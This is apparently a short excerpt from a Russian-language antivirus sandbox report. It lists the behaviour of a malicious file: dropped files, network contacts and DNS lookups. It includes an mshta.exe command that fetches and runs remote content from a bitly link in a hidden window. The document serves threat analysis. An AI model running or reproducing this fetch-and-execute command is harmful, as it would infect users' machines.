Техническая информация
- '<SYSTEM32>\mshta.exe' https://bitly.com/dyuiqwxbhjqvxbavsdjsav
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1352
- %HOMEPATH%\application data\microsoft\forms\powerpnt.box
- %TEMP%\1207073.cvr
- 'bi##y.com':443
- 'bi##y.com':443
- DNS ASK bi##y.com
- '<SYSTEM32>\mshta.exe' https://bitly.com/dyuiqwxbhjqvxbavsdjsav' (со скрытым окном)